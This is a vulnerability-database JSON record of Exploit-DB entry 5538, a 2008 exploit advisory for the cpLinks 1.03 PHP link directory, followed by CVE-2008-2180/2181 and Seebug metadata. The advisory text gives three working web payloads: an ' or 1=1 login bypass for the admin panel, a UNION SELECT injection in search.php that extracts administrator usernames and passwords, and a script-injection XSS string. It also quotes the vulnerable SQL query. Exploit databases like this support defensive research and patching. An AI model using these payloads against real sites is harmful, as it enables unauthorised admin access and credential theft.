{"bulletinFamily": "exploit", "id": "EDB-ID:5538", "cvelist": ["CVE-2008-2181", "CVE-2008-2180"], "modified": "2008-05-04T00:00:00", "lastseen": "2016-01-31T22:15:33", "edition": 1, "sourceData": "|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|\n| _ __ __ __ ______ |\n| /' \\ __ /'__`\\ /\\ \\__ /'__`\\ /\\ ___\\ |\n| /\\_, \\ ___ /\\_\\/\\_\\L\\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ __\\ \\ \\__/ |\n| \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ \\___``\\ |\n| \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\L\\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ \\/\\ \\L\\ \\ |\n| \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ \\ \\____/ |\n| \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ \\/___/ |\n| \\ \\____/ >> Kings of injection |\n| \\/___/ |\n| |\n|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|\n\nTitle :: cpLinks v1.03 Multiple Vulnerabilities (bypass/SQL/XXS)\n\n\nAuthor :: InjEctOr [s0f (at) w (dot) cn]\n\n&& FishEr762 [SQ7 (at) w (dot) cn ]\n\n\nScript Site :: http://www.cplinks.com/\n\nDork :: ThinkinG \n\nGreets :: Allah ,TryaG TeaM & Muslims Hackers\n\nTerms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.\n\n\n\n--------------------------------------------[C o n t e x t]-----------------------------------------\n\n\n\n\n##########################\n##Expl0!T1 bypass login ##\n##########################\n\n\nhttp://[site]/[script]/admin/\n\n\nin username filed insert:\n\n' or 1=1 /* \n\naddition, some time must type any thing in password field\n\n\n\n#####################################\n## Explo!T 2 Reomte SQL Injection ##\n#####################################\n\nfile/\nsearch.php\n\n\n@ line 57 ::\n\n\n$query = \"SELECT\n\t\t\tcategory,\n\t\t\tsub_category,\n\t\t\ttitle,\n\t\t\turl,\n\t\t\tdescription,\n\t\t\tstatus\n\t\t\tFROM mnl_links\n\t\t\tWHERE category='$search_category'\n\t\t\tAND description LIKE '%$search_text%'\n\t\t\tAND approved='yes'\n\t\t\tORDER BY status, rec_timestamp\";\n\n\nsearch url: http://localhost/[script's_bad_day]/search.php\n\nso just insert in search filed this query :)\n\n' union select admin_username,admin_password,3,4,5,6 from mnl_admin/*\n\n\n##################\n## EXpl!T3 Xss ##\n##################\n\n\nVulnerability found in script search.php .. also !\n\n\nin search field insert >\"> and then xss c0de ::\n\n\n\nexample: >\"><script>alert(\"!! InjEctOr TeaM Became Here !!\")</script>>\n\n\n\n############### T|-|4t'5 4ll ############### \n\n\n-------------------------------------------[End of context]----------------------------------------\n\n# milw0rm.com [2008-05-04]\n", "published": "2008-05-04T00:00:00", "href": "https://www.exploit-db.com/exploits/5538/", "osvdbidlist": ["44790", "44788", "44789"], "reporter": "InjEctOr5", "hash": "3765a908c7a305f8b91f7ed9226fd95c70d3633431af9df6fef8d43ea009b376", "title": "cplinks 1.03 bypass/sql/xxs Multiple Vulnerabilities", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "cpLinks 1.03 (bypass/SQL/XXS) Multiple Remote Vulnerabilities. CVE-2008-2180,CVE-2008-2181. Webapps exploit for php platform", "references": [], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/5538/", "enchantments": {"vulnersScore": 6.3}}

{"result": {"cve": [{"id": "CVE-2008-2181", "type": "cve", "title": "CVE-2008-2181", "description": "Multiple cross-site scripting (XSS) vulnerabilities in search.php in cpLinks 1.03 allow remote attackers to inject arbitrary web script or HTML via the (1) search_text and (2) search_category parameters. NOTE: the XSS reportedly occurs in a forced SQL error message. NOTE: some of these details are obtained from third party information.", "published": "2008-05-13T18:20:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2181", "cvelist": ["CVE-2008-2181"], "lastseen": "2016-09-03T10:30:49"}, {"id": "CVE-2008-2180", "type": "cve", "title": "CVE-2008-2180", "description": "Multiple SQL injection vulnerabilities in cpLinks 1.03, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) admin_username parameter (aka the username field) to admin/index.php and the (2) search_text and (3) search_category parameters to search.php. NOTE: some of these details are obtained from third party information.", "published": "2008-05-13T18:20:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2180", "cvelist": ["CVE-2008-2180"], "lastseen": "2016-09-03T10:30:49"}], "seebug": [{"id": "SSV-65365", "type": "seebug", "title": "cplinks 1.03 (bypass/sql/xxs) Multiple Vulnerabilities", "description": "Summary: \ncpLinks 1.03 version there are multiple SQL injection vulnerabilities. When magic_quotes_gpc is suspended, a remote attacker can use to the admin/index. php(1)The Administrator-the username parameter(aka the Username field)and to search. php(2)search_tex parameters, and(3)search_category parameters to execute arbitrary SQL commands.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-65365", "cvelist": ["CVE-2008-2180"], "lastseen": "2016-07-28T00:44:22"}]}}